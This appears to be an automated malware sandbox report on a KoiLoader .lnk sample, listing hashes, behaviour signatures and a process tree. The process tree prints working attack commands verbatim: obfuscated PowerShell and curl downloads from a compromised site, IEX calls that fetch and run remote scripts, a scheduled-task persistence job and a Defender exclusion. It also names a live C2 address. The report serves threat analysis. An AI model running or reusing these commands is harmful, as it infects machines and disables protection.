Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
22/03/2025, 02:03
Static task
static1
Behavioral task
behavioral1
Sample
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb.lnk
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb.lnk
Resource
win10v2004-20250314-en
General
-
Target
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb.lnk
-
Size
1KB
-
MD5
202ee916a0113699880cc2e48a73d353
-
SHA1
85d9b74b2afa5bf0320e746a2871ef614159db2e
-
SHA256
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb
-
SHA512
c729137c2680e98e9686d6a2368e184fc38897032d0d0bf1e1c5a84530cc45208bfc60085be768c027d4ce52b627a7f308458ac5ed480c32289bc5a0d7c0a35e
Malware Config
Extracted
https://casettalecese.it/wp-content/uploads/2022/10
Extracted
koiloader
http://94.247.42.253/pilot.php
-
payload_url
https://casettalecese.it/wp-content/uploads/2022/10
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral2/memory/1720-56-0x00000000075F0000-0x00000000075FD000-memory.dmp family_koi_loader -
Blocklisted process makes network request 6 IoCs
flow pid Process 7 3596 powershell.exe 50 1720 powershell.exe 51 1720 powershell.exe 57 3020 powershell.exe 65 3020 powershell.exe 76 1720 powershell.exe -
pid Process 3596 powershell.exe 3020 powershell.exe 1720 powershell.exe 4600 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation wscript.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 432 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5696 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3596 powershell.exe 3596 powershell.exe 432 powershell.exe 432 powershell.exe 1720 powershell.exe 1720 powershell.exe 4600 powershell.exe 4600 powershell.exe 4600 powershell.exe 3020 powershell.exe 3020 powershell.exe 3020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1728 wrote to memory of 3596 1728 cmd.exe 87 PID 1728 wrote to memory of 3596 1728 cmd.exe 87 PID 3596 wrote to memory of 4516 3596 powershell.exe 91 PID 3596 wrote to memory of 4516 3596 powershell.exe 91 PID 3596 wrote to memory of 5696 3596 powershell.exe 92 PID 3596 wrote to memory of 5696 3596 powershell.exe 92 PID 2880 wrote to memory of 432 2880 wscript.EXE 101 PID 2880 wrote to memory of 432 2880 wscript.EXE 101 PID 432 wrote to memory of 4216 432 powershell.exe 103 PID 432 wrote to memory of 4216 432 powershell.exe 103 PID 432 wrote to memory of 6072 432 powershell.exe 104 PID 432 wrote to memory of 6072 432 powershell.exe 104 PID 6072 wrote to memory of 1720 6072 wscript.exe 106 PID 6072 wrote to memory of 1720 6072 wscript.exe 106 PID 6072 wrote to memory of 1720 6072 wscript.exe 106 PID 4312 wrote to memory of 4328 4312 DllHost.exe 110 PID 4312 wrote to memory of 4328 4312 DllHost.exe 110 PID 4312 wrote to memory of 4328 4312 DllHost.exe 110 PID 4328 wrote to memory of 4600 4328 cmd.exe 112 PID 4328 wrote to memory of 4600 4328 cmd.exe 112 PID 4328 wrote to memory of 4600 4328 cmd.exe 112 PID 1720 wrote to memory of 5908 1720 powershell.exe 113 PID 1720 wrote to memory of 5908 1720 powershell.exe 113 PID 1720 wrote to memory of 5908 1720 powershell.exe 113 PID 5908 wrote to memory of 3020 5908 cmd.exe 116 PID 5908 wrote to memory of 3020 5908 cmd.exe 116 PID 5908 wrote to memory of 3020 5908 cmd.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('htphwirvsci9k5.js jycqenaew'); $getf='Dow'+'nl'+'oadF'+'ile'; $x5yd46kp30cefn911gg = New-Object Net.WebClient; $wscs = 'wscript '; $x5yd46kp30cefn911gg.$getf('https://casettalecese.it/wp-content/uploads/2022/10/hemigastrectomySDur.php', 'htphwirvsci9k5.js'); . ('curl.e'+'xe') -s -o cs5c09hr6xij 'https://casettalecese.it/wp-content/uploads/2022/10/bivalviaGrr.php'; mv cs5c09hr6xij 'jycqenaew.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $pdw) /tn jycqenaew;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -s -o cs5c09hr6xij https://casettalecese.it/wp-content/uploads/2022/10/bivalviaGrr.php3⤵PID:4516
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\htphwirvsci9k5.js jycqenaew" /tn jycqenaew3⤵
- Scheduled Task/Job: Scheduled Task
PID:5696
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\ProgramData\htphwirvsci9k5.js jycqenaew1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn jycqenaew /f; wscript $env:programdata\jycqenaew.js "2⤵
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn jycqenaew /f3⤵PID:4216
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\jycqenaew.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:6072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$typs=[Ref].Assembly.GetTypes();$bss = 'https://casettalecese.it/wp-content/uploads/2022/10'; Foreach($tt in $typs) {if ($tt.Name -like '*?siUt*s') {$c=$tt}}; $env:paths = '7zCD771U53GF'; IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/boomier10qD0.php')); IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/nephralgiaMsy.ps1'))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://casettalecese.it/wp-content/uploads/2022/10/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://casettalecese.it/wp-content/uploads/2022/10/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r63e48d52-8c45-4cbc-90d9-6336485f78d0r.js"1⤵PID:2336
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r63e48d52-8c45-4cbc-90d9-6336485f78d0r.js"1⤵PID:2888
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567533e8aa92bdea1787885cd15390154
SHA19c6fef375964dbb925d898158fe221b3841023b2
SHA256cbe808ef04691c719ad35a61e57e596a09a7f6f1a9d6ac03c128137fb54f1cc5
SHA51237c7aef9b86da2a631c14516955d14ba827ca978abafdb41d9a4b15b3aecd6adbd8dd92086fbcf3b9f24601c96f333bf50bed9b96a12ee7012a03fb53c046f25
-
Filesize
198B
MD5af9f1f2076317c03e21d56367e638af4
SHA161c4f850591f851acd3108104ef14f0fe32f95a6
SHA25670835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1
SHA512c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
344B
MD502c07d9e0c140702191d9225e1453dd5
SHA1c18501af4b88cc21474fbd6b543a6e1307846759
SHA2562646a70d417cdf527aef4e9e9d1c76f1c46c00e8619642ac26897173c5f03141
SHA5121aaf8789f3090273e5e28a60cabc8c72e66dc104cfd8e6f419c0a9be5975aa5713276d77861b732d8f7a09284efdac4908dba63702774a333e890d804c56119f
-
Filesize
1KB
MD57814a1e5bb7d98ddcd4254df3b64af39
SHA13c6ae8c10655b78d9e1436b7d5fc3da162709257
SHA25604100ee65503cc102a13ec81d6598013ed02995c67ee1adf9fd5bbeee8f518db
SHA5120fb089e1b86f9e8810e5e5fc980a1f4d560273917c4ad2e7c650867432f1a1c4961275fe7d45a9627d98eb0c5011d1a5f83d6457be638a77c2f65e426ae9ebac
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82